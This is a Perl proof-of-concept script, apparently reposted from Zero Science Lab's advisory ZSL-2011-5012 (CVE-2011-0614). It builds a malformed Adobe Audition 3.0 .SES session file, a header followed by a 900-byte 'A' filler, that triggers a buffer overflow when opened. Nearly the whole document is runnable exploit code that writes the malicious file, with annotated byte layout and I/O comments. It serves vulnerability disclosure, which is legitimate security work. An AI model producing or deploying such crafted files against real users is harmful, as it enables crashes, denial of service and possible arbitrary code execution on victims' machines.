Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2011-05-13  

#!/usr/bin/perl
#
#
# Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
#
#
# Vendor: Adobe Systems Inc.
# Product web page: http://www.adobe.com/products/audition/
# Affected version: 3.0 (build 7238)
#
# Summary: Recording, mixing, editing, and mastering — Adobe® Audition® 3 software is the
# all-in-one toolset for professional audio production.
#
# Desc: Adobe Audition suffers from a buffer overflow vulnerability when handling .SES
# (session) format files. The application fails to sanitize user input, resulting in
# memory corruption that overwrites several memory registers, which can help an attacker
# execute arbitrary code or cause a denial of service.
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# http://img225.imageshack.us/img225/9871/boferror.jpg
#
#
# Zero Science Lab Advisory ID: ZSL-2011-5012
# Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php
#
# Adobe Advisory ID: APSB11-10
# Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html
#
# CVE ID: CVE-2011-0614
#
#
# 18.09.2009
#


# Contents of the crafted .SES session file, assembled as one byte string.
# Layout as visible in the bytes themselves (field meanings other than the
# two ASCII tags are not documented on this page):
#    52 bytes  header, beginning with ASCII "COOLNESS" and containing "hdr "
#   900 bytes  0x41 ('A') filler -- presumably the over-long field the
#              advisory text refers to; the page does not name the field
#     1 byte   NUL terminator
$data = join '',
    "\x43\x4F\x4F\x4C\x4E\x45\x53\x53",    # ASCII "COOLNESS"
    "\x50\xF2\x08\x00",
    "\x68\x64\x72\x20",                    # ASCII "hdr "
    "\xF0\x03\x00\x00\x22\x56\x00\x00",
    "\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00",
    "\x00\x00\x00\x00\x00\x00\xF0\x3F",
    "\x00\x00\x00\x00\x00\x00\xF0\x3F",
    "\x41" x 900,                          # filler run, no structure
    "\x00";


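# Write $data to the file named by $FNAME in the current directory, printing
# progress to STDOUT and dying on any I/O failure.
$FNAME = "Assassin.ses";

print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";

# Three-argument open with a lexical handle: the mode is fixed here and the
# file name is never parsed for a mode prefix. The :raw layer is used because
# $data is binary and contains a 0x0A byte, which a CRLF text layer (e.g. on
# Windows) would otherwise expand to two bytes on disk.
open(my $ses_fh, '>:raw', "./$FNAME") || die "\n\aCannot open $FNAME: $!";

# Check the write itself; the original printed the success message even when
# the write had failed.
print {$ses_fh} $data or die "\n\aCannot write $FNAME: $!";
sleep(1);    # pause kept from the original; nothing visible here depends on it

# Buffered write errors only surface at close, so check it before reporting
# success.
close($ses_fh) || die "\n\aCannot close $FNAME: $!";

print "\n[*] Malicious session file successfully crafted!\r\n\n";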


 